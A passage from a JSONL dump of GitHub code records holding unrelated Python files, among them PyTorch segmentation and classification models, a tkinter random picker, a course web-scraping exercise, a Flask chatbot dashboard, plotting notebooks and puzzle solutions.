self).__init__()\r\n self.unit1_0 = general_conv3d(in_channels, n_base_filters)\r\n self.unit1 = nn.Sequential(\r\n general_conv3d(n_base_filters, n_base_filters, dropout=0.3),\r\n general_conv3d(n_base_filters, n_base_filters),\r\n )\r\n\r\n self.unit2_0 = general_conv3d(n_base_filters, n_base_filters*2, stride=2)\r\n self.unit2 = nn.Sequential(\r\n general_conv3d(n_base_filters*2, n_base_filters*2, dropout=0.3),\r\n general_conv3d(n_base_filters*2, n_base_filters*2),\r\n )\r\n\r\n self.unit3_0 = general_conv3d(n_base_filters*2, n_base_filters*4, stride=2)\r\n self.unit3 = nn.Sequential(\r\n general_conv3d(n_base_filters*4, n_base_filters*4, dropout=0.3),\r\n general_conv3d(n_base_filters*4, n_base_filters*4 ),\r\n )\r\n\r\n self.unit4_0 = general_conv3d(n_base_filters * 4, n_base_filters*8, stride=2)\r\n self.unit4 = nn.Sequential(\r\n general_conv3d(n_base_filters*8, n_base_filters * 8, dropout=0.3),\r\n general_conv3d(n_base_filters * 8, n_base_filters * 8),\r\n )\r\n\r\n def forward(self, inputs):\r\n output1_0 = self.unit1_0(inputs)\r\n output1 = self.unit1(output1_0) + output1_0\r\n\r\n output2_0 = self.unit2_0(output1)\r\n output2 = self.unit2(output2_0) + output2_0\r\n\r\n output3_0 = self.unit3_0(output2)\r\n output3 = self.unit3(output3_0) + output3_0\r\n\r\n output4_0 = self.unit4_0(output3)\r\n output4 = self.unit4(output4_0) + output4_0\r\n\r\n return {\r\n 's1': output1,\r\n 's2': output2,\r\n 's3': output3,\r\n 's4': output4,\r\n }\r\n\r\nclass image_decoder(nn.Module):\r\n def __init__(self, input_channel, mlp_ch=128, img_ch=1, scale=4):\r\n super(image_decoder, self).__init__()\r\n channel = mlp_ch\r\n self.scale = scale\r\n self.ar1 = adaptive_resblock(input_channel, channel)\r\n self.ar2 = adaptive_resblock(channel, channel)\r\n self.ar3 = adaptive_resblock(channel, channel)\r\n self.ar4 = adaptive_resblock(channel, channel)\r\n\r\n self.mlp = mlp(channel)\r\n self.features = nn.Sequential()\r\n in_channel = channel\r\n out_channel = channel\r\n self.lrelu = nn.LeakyReLU(0.01)\r\n for i in range(scale-1):\r\n out_channel = in_channel // 2\r\n up_block = nn.Upsample(scale_factor=2, mode='trilinear', align_corners=False)\r\n conv_block = general_conv3d(in_channel, out_channel, kernel_size=5, stride=1)\r\n norm_block = nn.InstanceNorm3d(out_channel)\r\n self.features.add_module('upblock%d' % (i+1), up_block)\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n self.features.add_module('normblock%d' % (i+1), norm_block)\r\n\r\n in_channel = out_channel\r\n self.conv_final = general_conv3d(out_channel, img_ch, kernel_size=7, stride=1)\r\n\r\n\r\n def forward(self, style, content):\r\n mu, sigma = self.mlp(style)\r\n x = self.ar1(content, mu, sigma)\r\n x = self.ar2(x, mu, sigma)\r\n x = self.ar3(x, mu, sigma)\r\n x = self.ar4(x, mu, sigma)\r\n\r\n for i in range(self.scale - 1):\r\n x = getattr(self.features, 'upblock%d' % (i+1))(x)\r\n x = getattr(self.features, 'convblock%d' % (i+1))(x)\r\n x = getattr(self.features, 'normblock%d' % (i+1))(x)\r\n x = self.lrelu(x)\r\n\r\n x = self.conv_final(x)\r\n\r\n return x, mu, sigma\r\n\r\nclass mask_decoder(nn.Module):\r\n def __init__(self, input_channel, n_base_filters=16, num_cls=4):\r\n super(mask_decoder, self).__init__()\r\n\r\n self.features = nn.Sequential()\r\n in_channel = input_channel\r\n out_channel = n_base_filters * 4\r\n for i in range(3):\r\n up_block = nn.Upsample(scale_factor=2, mode='trilinear', align_corners=False)\r\n conv_block1 = general_conv3d(in_channel, out_channel)\r\n conv_block2 = general_conv3d(out_channel*2, out_channel)\r\n conv_block3 = general_conv3d(out_channel, out_channel, kernel_size=1)\r\n\r\n self.features.add_module('upblock%d' % (i+1), up_block)\r\n self.features.add_module('convblock1%d' % (i+1), conv_block1)\r\n self.features.add_module('convblock2%d' % (i+1), conv_block2)\r\n self.features.add_module('convblock3%d' % (i+1), conv_block3)\r\n\r\n in_channel = out_channel\r\n out_channel = out_channel // 2\r\n\r\n self.conv_seg = general_conv3d(in_channel, num_cls, kernel_size=1, norm_type=False, act=False)\r\n\r\n\r\n def forward(self, inp):\r\n input = [inp['e4_out'], inp['e3_out'], inp['e2_out'], inp['e1_out']]\r\n\r\n out = input[0]\r\n for i in range(3):\r\n out = getattr(self.features, 'upblock%d' % (i + 1))(out)\r\n out = getattr(self.features, 'convblock1%d' % (i + 1))(out)\r\n out = torch.cat([out, input[i+1]], dim=1)\r\n out = getattr(self.features, 'convblock2%d' % (i + 1))(out)\r\n out = getattr(self.features, 'convblock3%d' % (i + 1))(out)\r\n seg = self.conv_seg(out)\r\n\r\n return seg\r\n\r\n\r\n\r\n\r\nclass adaptive_resblock(nn.Module):\r\n def __init__(self,input_channel, channel):\r\n super(adaptive_resblock, self).__init__()\r\n self.conv1 = general_conv3d(input_channel, channel)\r\n self.lrelu = nn.LeakyReLU(0.01)\r\n self.conv2 = general_conv3d(channel, channel)\r\n\r\n\r\n def forward(self, x_init, mu, sigma):\r\n x = self.adaptive_instance_norm(self.conv1(x_init), mu, sigma)\r\n x = self.lrelu(x)\r\n x = self.adaptive_instance_norm(self.conv2(x), mu, sigma)\r\n return x + x_init\r\n\r\n\r\n def adaptive_instance_norm(self, content, gamma, beta):\r\n c_mean = torch.mean(content, dim=(2, 3, 4), keepdim=True)\r\n c_std = torch.std(content, dim=(2, 3, 4), keepdim=True)\r\n return gamma * ((content - c_mean) / c_std) + beta\r\n\r\nclass mlp(nn.Module):\r\n def __init__(self, channel):\r\n super(mlp, self).__init__()\r\n self.channel = channel\r\n self.unit = nn.Sequential(\r\n linear(channel),\r\n nn.LeakyReLU(0.01),\r\n linear(channel),\r\n nn.LeakyReLU(0.01),\r\n )\r\n self.get_mu = linear(channel)\r\n self.get_sigma = linear(channel)\r\n\r\n def forward(self, style):\r\n s = self.unit(style)\r\n mu = self.get_mu(s)\r\n sigma = self.get_sigma(s)\r\n\r\n mu = mu.view(-1, self.channel, 1, 1, 1)\r\n sigma = sigma.view(-1, self.channel, 1, 1, 1)\r\n\r\n return mu, sigma\r\n\r\n\r\n# ****************************************************************************************\r\n# ------------------------------------- lmcr basic blocks -------------------------------\r\n# ****************************************************************************************\r\nclass ResDilBlock3D(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, norm_type='instance', bias=True, flag='encoder'):\r\n super(ResDilBlock3D, self).__init__()\r\n\r\n self.conv1 = ConvNormRelu3D(in_channels, out_channels, kernel_size=kernel_size, padding='same',\r\n norm_type=norm_type, dilation=2, bias=bias)\r\n self.conv2 = ConvNormRelu3D(out_channels, out_channels, kernel_size=kernel_size, padding='same',\r\n norm_type=norm_type, dilation=4, bias=bias)\r\n self.relu = nn.LeakyReLU(0.01, inplace=True)\r\n\r\n def forward(self, inputs):\r\n outputs = self.conv1(inputs)\r\n outputs = self.conv2(outputs)\r\n return self.relu(outputs+inputs)\r\n\r\n\r\nclass LMCREncoder(nn.Module):\r\n def __init__(self, in_channels=1, feature_maps=64, levels=4, norm_type='instance', use_dropout=True, bias=True):\r\n super(LMCREncoder, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n self.use_dropout = use_dropout\r\n if self.use_dropout:\r\n self.dropout = nn.Dropout()\r\n\r\n in_features = in_channels\r\n for i in range(levels):\r\n out_features = (2**i) * feature_maps\r\n\r\n conv_block = ConvNormRelu3D(in_features, out_features, norm_type=norm_type, bias=bias)\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n resdil_block = ResDilBlock3D(out_features, out_features, norm_type=norm_type, bias=bias)\r\n self.features.add_module('resdilblock%d' % (i + 1), resdil_block)\r\n\r\n pool = nn.MaxPool3d(kernel_size=2, stride=2)\r\n self.features.add_module('pool%d' % (i+1), pool)\r\n\r\n in_features = out_features\r\n\r\n\r\n def forward(self, inputs):\r\n encoder_outputs = []\r\n outputs = inputs\r\n for i in range(self.levels):\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n outputs = getattr(self.features, 'resdilblock%d' % (i+1))(outputs)\r\n\r\n if i == self.levels-1:\r\n continue\r\n if self.use_dropout:\r\n encoder_outputs.append(self.dropout(outputs))\r\n else:\r\n encoder_outputs.append(outputs)\r\n outputs = getattr(self.features, 'pool%d' % (i+1))(outputs)\r\n\r\n return encoder_outputs, outputs\r\n\r\n\r\nclass LMCRDecoder(nn.Module):\r\n def __init__(self, out_channels, feature_maps=64, levels=4, norm_type='instance', bias=True, type='seg'):\r\n super(LMCRDecoder, self).__init__()\r\n self.out_channels = out_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.type = type\r\n self.features = nn.Sequential()\r\n\r\n for i in range(levels-1):\r\n upconv = UNetUpSamplingBlock3D(2**(levels-i-1) * feature_maps, 2**(levels-i-1) * feature_maps, deconv=False,\r\n bias=bias)\r\n self.features.add_module('upconv%d' % (i+1), upconv)\r\n\r\n conv_block = ConvNormRelu3D(2**(levels-i-2) * feature_maps * 3, 2**(levels-i-2) * feature_maps, norm_type=norm_type, bias=bias)\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n resdil_block = ResDilBlock3D(2**(levels-i-2) * feature_maps, 2**(levels-i-2) * feature_maps, norm_type=norm_type, bias=bias)\r\n self.features.add_module('resdilblock%d' % (i+1), resdil_block)\r\n\r\n if self.type=='seg':\r\n conv = nn.Conv3d(2**(levels-i-2) * feature_maps, out_channels, kernel_size=1, stride=1, bias=bias)\r\n self.features.add_module('conv%d' % (i + 1), conv)\r\n up = UNetUpSamplingBlock3D(2 ** (levels - i - 1) * feature_maps, 2 ** (levels - i - 1) * feature_maps,\r\n deconv=False,\r\n bias=bias)\r\n self.features.add_module('up%d' % (i + 1), up)\r\n self.score = nn.Conv3d(feature_maps, out_channels, kernel_size=1, stride=1, bias=bias)\r\n\r\n def forward(self, inputs, encoder_outputs):\r\n encoder_outputs.reverse()\r\n outputs = inputs\r\n deep_outputs = None\r\n\r\n for i in range(self.levels-1):\r\n outputs = getattr(self.features, 'upconv%d' % (i+1))(outputs)\r\n outputs = torch.cat([encoder_outputs[i], outputs], dim=1)\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n outputs = getattr(self.features, 'resdilblock%d' % (i+1))(outputs)\r\n if self.type == 'seg' and i != self.levels-2:\r\n if deep_outputs is None:\r\n deep_outputs = getattr(self.features, 'conv%d' % (i+1))(outputs.clone())\r\n else:\r\n deep_outputs += getattr(self.features, 'conv%d' % (i+1))(outputs.clone())\r\n deep_outputs = getattr(self.features, 'up%d' % (i+1))(deep_outputs)\r\n\r\n encoder_outputs.reverse()\r\n if type == 'seg':\r\n return deep_outputs + self.score(outputs)\r\n else:\r\n return self.score(outputs)\r\n\r\nclass MPE(nn.Module):\r\n def __init__(self, channels):\r\n super(MPE, self).__init__()\r\n self.pool = nn.AdaptiveAvgPool3d(1)\r\n self.unit = nn.Sequential(\r\n nn.Linear(channels, channels),\r\n nn.LeakyReLU(0.01, inplace=True),\r\n nn.Linear(channels, 4)\r\n )\r\n\r\n def forward(self, data):\r\n output = self.pool(data).view(data.size(0),-1)\r\n output = self.unit(output)\r\n return output\r\n\r\n\r\nclass CR(nn.Module):\r\n def __init__(self, channels):\r\n super(CR, self).__init__()\r\n self.MPE = MPE(channels)\r\n\r\n def forward(self, inputs):\r\n outputs = []\r\n\r\n f0 = self.MPE(inputs[0])\r\n outputs.append(f0[0][0]+\r\n f0[0][1]*inputs[1]+\r\n f0[0][2]*inputs[2]+\r\n f0[0][3]*inputs[3])\r\n\r\n f1 = self.MPE(inputs[1])\r\n outputs.append(f1[0][0] * inputs[0] +\r\n f1[0][1] +\r\n f1[0][2] * inputs[2] +\r\n f1[0][3] * inputs[3])\r\n\r\n f2 = self.MPE(inputs[2])\r\n outputs.append(f2[0][0] * inputs[0] +\r\n f2[0][1] * inputs[1] +\r\n f2[0][2] +\r\n f2[0][3] * inputs[3])\r\n\r\n f3 = self.MPE(inputs[3])\r\n outputs.append(f3[0][0] * inputs[0] +\r\n f3[0][1] * inputs[1] +\r\n f3[0][2] * inputs[2] +\r\n f3[0][3] )\r\n return outputs\r\n\r\nclass LMCR_Fusion(nn.Module):\r\n def __init__(self, channels):\r\n super(LMCR_Fusion, self).__init__()\r\n self.pool = nn.AdaptiveAvgPool3d(1)\r\n self.ca = nn.Sequential(\r\n nn.Linear(channels*4, channels*4),\r\n nn.LeakyReLU(0.01, inplace=True),\r\n nn.Linear(channels*4, channels*4)\r\n )\r\n self.sa = nn.Conv3d(channels*4, 1, kernel_size=1, stride=1)\r\n self.conv = nn.Conv3d(channels*4, channels, kernel_size=1, stride=1)\r\n def forward(self, inputs):\r\n input = None\r\n for i in range(len(inputs)):\r\n if input is None:\r\n input = inputs[i]\r\n else:\r\n input = torch.cat([input, inputs[i]],dim=1)\r\n\r\n ca_map = torch.sigmoid(self.ca(self.pool(input).view(input.size(0),-1)))\r\n ca_map = ca_map.unsqueeze(dim=-1).unsqueeze(dim=-1).unsqueeze(dim=-1)\r\n sa_map = torch.sigmoid(self.sa(input))\r\n return self.conv(input*ca_map+input*sa_map)\r\n","repo_name":"scut-cszcl/SFusion","sub_path":"net/BasicBlock.py","file_name":"BasicBlock.py","file_ext":"py","file_size_in_byte":33728,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"30550045747","text":"\"\"\"\r\nProgram: randlistpick.py\r\n\"\"\"\r\nfrom breezypythongui import EasyFrame\r\nimport random\r\n\r\nn = [\"Miles\", \"Alexa\", \"Andrew\", \"George\", \"James\", \"Kofi\", \"Kurt\", \"Letisha\", \"Michael\", \"Nicolas\", \"Stepanie\", \"Thomas\"]\r\n\r\nclass RandListPick(EasyFrame):\r\n \r\n def __init__(self):\r\n EasyFrame.__init__(self, \"Random winner pick\")\r\n \r\n self.addLabel(\"winner is\",\r\n row = 0, column = 0)\r\n \r\n self.nameF = self.addTextField(text = \"\",\r\n row = 0, column = 1)\r\n \r\n self.addButton(text = \"Random Pick!\",\r\n row = 1, column = 0,\r\n columnspan = 2,\r\n command = self.randPick)\r\n self.lastWinner = \"\"\r\n \r\n \r\n def randPick(self):\r\n name = random.choice(n)\r\n \r\n while name == self.lastWinner:\r\n name = random.choice(n)\r\n \r\n self.nameF.setText(name)\r\n self.lastWinner = name\r\n \r\n \r\n \r\n#Definition of the main() function\r\ndef main():\r\n \"\"\"instantiantes and pops up the window\"\"\"\r\n RandListPick().mainloop()\r\n \r\nif __name__ == \"__main__\":\r\n main() ","repo_name":"Milzybyte/randlistpick.py","sub_path":"randlistpick.py","file_name":"randlistpick.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35869144075","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\nimport json\n\n# 1-------------------------------------------------\nstart_url = 'http://parsinger.ru/html/index1_page_1.html'\nstart_response = requests.get(start_url, timeout=10)\nstart_soup = BeautifulSoup(start_response.text, 'lxml')\npage_hrefs = [x['href'] for x in start_soup.find('div', class_='pagen').find_all('a')] # собираю страницы часов\n# 1-------------------------------------------------\n\n# 2------------------------------------------------\njson_items = []\nfor page_href in tqdm(page_hrefs):\n page_url = f'http://parsinger.ru/html/{page_href}'\n page_response = requests.get(page_url, timeout=10)\n page_soup = BeautifulSoup(page_response.text, 'lxml')\n\n item_hrefs = [x['href'] for x in page_soup.find_all('a', class_='name_item')]\n\n for href in item_hrefs:\n item = {}\n item_url = f'http://parsinger.ru/html/{href}'\n item_response = requests.get(item_url)\n item_response.encoding = 'utf-8'\n item_soup = BeautifulSoup(item_response.text, 'lxml')\n\n name = item_soup.find('p', id='p_header').text\n price = item_soup.find('span', id='price').text.split()[0]\n item['name'] = name\n item['price'] = price\n\n fields = [x['id'] for x in item_soup.find('ul', id='description').find_all('li')]\n description = item_soup.find('ul', id='description')\n for field in fields:\n value = description.find('li', id=field).text.split(': ')[1]\n item[field] = value\n\n json_items.append(item)\n# 2---------------------------------------------------\n\n# 3---------------------------------------------------\nwith open('result.json', 'w', encoding='utf-8') as file:\n json.dump(json_items, file, ensure_ascii=False, indent=4)\nprint(f'File is created. Absolute number of records: {len(json_items)}')\n# 3----------------------------------------------------\n","repo_name":"andreyshishkov/stepik_parsing_course","sub_path":"module_4/4.9/1_json/1_json.py","file_name":"1_json.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"846334161","text":"ILE_DNI = 7\n\ntemp = 0\ni = 0\nwhile i <= ILE_DNI:\n temp_i = float(input(f\"Podaj temperature w dniu {i}\"))\n temp += temp_i\n i += 1\n\nprint(\"Srednia temp wynosila: \", temp/ILE_DNI)","repo_name":"KrWojtek19/bootcamp_08122018","sub_path":"basics/zadanie_13.py","file_name":"zadanie_13.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42875480484","text":"import torch\nfrom torch import nn\nimport torchvision.models as models\nfrom tqdm import tqdm\n\ndef get_model(model_name):\n if model_name == \"cnn\":\n return CNN()\n else:\n raise ValueError(\"please input model name\")\n\n# ------------ classification model\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 16, kernel_size=3, padding=1), \n nn.BatchNorm2d(16),\n nn.Dropout(0.2), \n nn.ReLU(),\n nn.MaxPool2d(2) \n )\n\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 64, kernel_size=3, padding=1), \n nn.BatchNorm2d(64),\n nn.Dropout(0.2), \n nn.ReLU(),\n nn.MaxPool2d(2) \n )\n\n self.layer3 = nn.Sequential(\n nn.Conv2d(64, 128, kernel_size=3, padding=1), \n nn.BatchNorm2d(128),\n nn.Dropout(0.2), \n nn.ReLU(),\n nn.MaxPool2d(2) \n )\n \n self.fc1 = nn.Sequential(\n nn.Linear(1152, 1024),\n nn.Dropout(0.2), \n nn.ReLU()\n )\n\n self.fc2 = nn.Linear(1024, 10)\n\n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n# x = self.layer4(x)\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n \n","repo_name":"Karenou/DataMining","sub_path":"digit_classification/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22903037423","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# 1.Scipy:\n# We have the min and max temperatures in a city In India for each months of the year.\n# We would like to find a function to describe this and show it graphically, the dataset\n# given below.\n# Task:\n# 1.fitting it to the periodic function\n# 2.plot the fit\n# Data\n# Max = 39, 41, 43, 47, 49, 51, 45, 38, 37, 29, 27, 25\n# Min = 21, 23, 27, 28, 32, 35, 31, 28, 21, 19, 17, 18\n\n# In[8]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import optimize\n\n\n# In[3]:\n\n\ntemp_max = np.array([39, 41, 43, 47, 49, 51, 45, 38, 37, 29, 27, 25])\ntemp_min = np.array([21, 23, 27, 28, 32, 35, 31, 28, 21, 19, 17, 18])\n\nimport matplotlib.pyplot as plt\nmonths = np.arange(12)\nplt.plot(months, temp_max, 'ro')\nplt.plot(months, temp_min, 'bo')\nplt.xlabel('Month')\nplt.ylabel('Min and max temperature')\n\n\n# In[5]:\n\n\ndef yearly_temps(times, avg, ampl, time_offset):\n return (avg\n + ampl * np.cos((times + time_offset) * 2 * np.pi / times.max()))\n\nres_max, cov_max = optimize.curve_fit(yearly_temps, months,\n temp_max, [20, 10, 0])\nres_min, cov_min = optimize.curve_fit(yearly_temps, months,\n temp_min, [-40, 20, 0])\n\n\n# In[6]:\n\n\ndays = np.linspace(0, 12, num=365)\n\nplt.figure()\nplt.plot(months, temp_max, 'ro')\nplt.plot(days, yearly_temps(days, *res_max), 'r-')\nplt.plot(months, temp_min, 'bo')\nplt.plot(days, yearly_temps(days, *res_min), 'b-')\nplt.xlabel('Month')\nplt.ylabel('Temperature ($^\\circ$C)')\n\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# 2.Matplotlib:\n# This assignment is for visualization using matplotlib:\n# data to use:\n# url=https://raw.githubusercontent.com/Geoyi/Cleaning-Titanic-Data/master/titanic_original.csv\n# titanic = pd.read_csv(url)\n# Charts to plot:\n# 1. Create a pie chart presenting the male/female proportion\n# 2. Create a scatterplot with the Fare paid and the Age, differ the plot color by gender\n\n# In[10]:\n\n\ndata = pd.read_csv('https://raw.githubusercontent.com/Geoyi/Cleaning-Titanic-Data/master/titanic_original.csv')\ndata.head(5)\n\n\n# In[11]:\n\n\n#a. Create a pie chart presenting the male/female proportion\ns=round((data['sex'].value_counts())/len(data)*100,2)\npd.DataFrame(s)\n\n\n# In[12]:\n\n\nlabels = ['male','female']\nsizes = data.sex.value_counts()\nfig1, ax1 = plt.subplots()\nax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, colors = ['Green'\n,'Red'])\n#ax1.axis('equal')\nplt.show()\n\n\n# In[15]:\n\n\n# b. Create a scatterplot with the Fare paid and the Age, differ the plot color by gender\nplt.figure()\ncategory1 = data[data.sex=='male'].plot.scatter('age', 'fare', color='blue',label='male')\ndata[data.sex=='female'].plot.scatter('age', 'fare',color='red',label='female',ax=category1)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"alexpanackal333/Machine-Learning","sub_path":"Matplotlib Assignment.py","file_name":"Matplotlib Assignment.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22825369053","text":"from flask import Blueprint, render_template, request, redirect, url_for\r\nfrom flask_login import current_user, login_required\r\n\r\nfrom poodtam import models\r\nfrom chatbot import chat_answer\r\nfrom chatbot import TYPE_CORPUS as RESTAURANT_TYPE\r\nfrom chatbot.dataset import EXAMPLE_SENTENCE\r\n\r\nimport random\r\nimport datetime\r\nimport time\r\nimport pandas as pd\r\nimport io\r\n\r\nmodule = Blueprint(\"dashboard\", __name__, url_prefix=\"/\")\r\n\r\n\r\ndef is_openning(opened_time, closed_time):\r\n now_time = datetime.datetime.now().time()\r\n if now_time > opened_time.time() and now_time < closed_time.time():\r\n return True\r\n return False\r\n\r\n@module.route(\"/\", methods=[\"GET\"])\r\n@login_required\r\ndef index():\r\n user = current_user._get_current_object()\r\n chats = models.Chat.objects(user=user).order_by(\"-created_date\")\r\n\r\n chat_id = request.args.get(\"chat_id\", None)\r\n chat = models.Chat.objects(user=user).first()\r\n if chat_id:\r\n chat = models.Chat.objects.get(id=chat_id)\r\n \r\n if not chat:\r\n chat = models.Chat()\r\n chat.user = user\r\n chat.name = f\"Chat {models.Chat.objects().count() + 1}\"\r\n chat.create_bot_message(\"text\", \"Ask me...\")\r\n chat.save()\r\n return render_template(\r\n \"/dashboard/index.html\",\r\n chat=chat,\r\n chats=chats,\r\n is_openning=is_openning,\r\n RESTAURANT_TYPE=RESTAURANT_TYPE,\r\n )\r\n\r\n@module.route(\"/submit_message/\", methods=[\"GET\"])\r\ndef submit_message(chat_id):\r\n chat = models.Chat.objects.get(id=chat_id)\r\n input = request.args.get(\"input\", None)\r\n if input:\r\n chat.create_user_message(\"text\", input)\r\n chat_answer(chat, input)\r\n return redirect(url_for('dashboard.index', chat_id=chat.id))\r\n\r\n@module.route(\"/random_sentence\")\r\ndef random_sentence():\r\n sentence = random.choice(EXAMPLE_SENTENCE)\r\n return sentence","repo_name":"alkaline1024/poodtam","sub_path":"poodtam/web/views/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28756356434","text":"# -*- coding: utf-8 -*-\nimport os\nimport random\n\nfrom chainer.dataset import DatasetMixin\nimport numpy as np\nfrom scipy.misc import imresize\n\n\ncode_dir = os.path.split(__file__)[0]\ndata_dir = os.path.abspath(os.path.join(code_dir, '..', 'data'))\nmean_image_path = os.path.join(data_dir, 'ilsvrc_2012_mean.npy')\n\n\ndef resize(img, size=256):\n \"\"\"Resize image\"\"\"\n img = img.transpose(1, 2, 0) # (C, H, W) => (H, W, C)\n img = imresize(img, (size, size))\n img = img.transpose(2, 0, 1) # (H, W, C) => (C, H, B)\n img = img.astype(np.float32)\n\n return img\n\n\ndef random_crop(img, crop_size=227):\n \"\"\"Crop image randomly\"\"\"\n w, h = img.shape[2], img.shape[1]\n\n x0 = random.randint(0, w - crop_size)\n y0 = random.randint(0, h - crop_size)\n img = img[:, y0: y0 + crop_size, x0: x0 + crop_size]\n\n return img\n\n\ndef crop_center(img, crop_size=227):\n \"\"\"Crop center of given image\"\"\"\n w, h = img.shape[2], img.shape[1]\n\n x0 = int((w - crop_size) / 2.)\n y0 = int((h - crop_size) / 2.)\n img = img[:, y0: y0 + crop_size, x0: x0 + crop_size]\n\n return img\n\n\nclass CIFAR10Datset(DatasetMixin):\n \"\"\"CIFAR10 dataset for SSDH training\"\"\"\n\n def __init__(self, dataset, random=False):\n self._dataset = dataset\n self._random = random\n\n mean = np.load(mean_image_path).astype(np.float32)\n self._mean = mean\n\n def __len__(self):\n return len(self._dataset)\n\n def get_example(self, i):\n img, label = self._dataset[i]\n\n # preprocess\n img = resize(img)\n img = img - self._mean\n if self._random:\n img = random_crop(img)\n if random.random() > 0.5:\n img = img[:, :, ::-1] # flip horizontal\n else:\n img = crop_center(img)\n\n return img, label\n","repo_name":"t-hanya/chainer-SSDH","sub_path":"code/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"13032814168","text":"# order = [1,2,3]\norder = [6,13,1,15,2,0]\nwhenSaid = {}\nfor i in range(len(order)):\n whenSaid[order[i]] = [i]\n\nfor i in range(30000000-len(order)):\n last = order[len(order)-1]\n if len(whenSaid[last]) == 1:\n order.append(0)\n if 0 not in whenSaid:\n whenSaid[0] = []\n whenSaid[0].append(len(order)-1)\n else:\n number = whenSaid[last][-1] - whenSaid[last][-2]\n order.append(number)\n if(number not in whenSaid):\n whenSaid[number] = []\n whenSaid[number].append(len(order)-1)\nprint(order[-1])\n#print(len(order))\n \n\n\n","repo_name":"davidcbc/aoc","sub_path":"2020/python/day15-1.py","file_name":"day15-1.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26010530869","text":"# PROJECT EULER PROBLEM 111 - Primes With Runs\nfrom primeCheck import isPrime\nfrom collections import Counter\n\nnumbers = [x for x in range(0,10)]\n\ndef bitList(x,n):\n # NOTE: The additional -1 in the range is to omit masks with all 1s\n for i in range(1,(2<<(x-1))-1):\n out = str(bin(i)).lstrip(\"0b\")\n while len(out) < x:\n out = \"0\"+out\n out = list(out)\n if Counter(out)['0'] == n:\n yield(out)\n\nprime_dict = {}\nresult = 0\nfor i in range(0,10):\n for n in range(9,1,-1):\n prime_list = []\n for bits in bitList(10,n):\n if ((i%2==0) or (i==5)) and (bits[len(bits)-1]=='0'):\n continue\n if (i==0 and bits[0]=='0'):\n continue\n for j in range(0,10**(10-n)):\n #print(n,i,j)\n if ((j%2==0) or (j==5)) and (bits[len(bits)-1]=='1'):\n continue\n J = str(j)\n while len(J) < (10-n):\n J = '0'+J\n skip_j = False\n for jj in range(len(J)):\n if int(J[jj]) == i:\n skip_j = True\n break\n if skip_j:\n continue\n if (J[0]=='0' and bits[0]=='1'):\n continue\n out_str = ''\n for bit in bits:\n if bit == '0':\n out_str += str(i)\n else:\n out_str += J[0:1]\n J = J[1:]\n out_val = int(out_str)\n if isPrime(out_val):\n print(out_val)\n prime_list.append(out_val)\n result += out_val\n if len(prime_list) != 0:\n break\n prime_dict[i] = prime_list\nprint(result)\n","repo_name":"randolchance/PythonProjects","sub_path":"ProjectEulerSolutions/PE111/PE111-PrimesWithRuns.py","file_name":"PE111-PrimesWithRuns.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41714645891","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', news_list, name='news_list_url'),\n path('search/', search_view, name='search_view_url'),\n path('post/create/', PostCreate.as_view(), name='post_create_url'),\n path('post//', post_detail, name='post_detail_url'),\n path('post//update/', PostUpdate.as_view(), name='post_update_url'),\n path('post//delete/', PostDelete.as_view(), name='post_delete_url'),\n path('tag/create/', TagCreate.as_view(), name='tag_create_url'),\n path('tag//', tag_detail, name='tag_detail_url'),\n path('tag//update/', TagUpdate.as_view(), name='tag_update_url'),\n path('tag//delete/', TagDelete.as_view(), name='tag_delete_url'),\n]\n","repo_name":"suprenum/itae","sub_path":"feed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5361490998","text":"\"\"\"\ntag: 树;二叉树;深度优先搜索;广度优先搜索;递归\n剑指 Offer 26. 